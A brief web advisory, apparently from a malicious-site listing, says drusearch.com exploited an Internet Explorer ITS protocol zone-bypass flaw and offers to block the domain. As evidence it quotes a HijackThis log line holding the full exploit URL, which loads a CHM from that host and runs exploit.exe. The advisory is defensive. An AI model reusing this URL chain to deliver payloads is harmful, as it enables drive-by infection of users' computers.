Skip to content


submitted by Roger Karlsson

drusearch.com seems to have been exploiting the Microsoft Internet Explorer ITS Protocol Zone Bypass Vulnerability, based on the following Hijackthis log entry:

O16 - DPF: {11010101-1001-1111-1000-110112345679} - ms-its:mhtml:file://C:\MAIN.MHT!http://drusearch.com//my/EXPLOIT.CHM::/exploit.exe

Koffix offers you the possibility to:

  1. add drusearch.com to the restricted zone
  2. add drusearch.com to the HOSTS file

The information about drusearch.com is licensed under Creative Commons Attribution 2.5 License.


No comments posted yet.

Leave a reply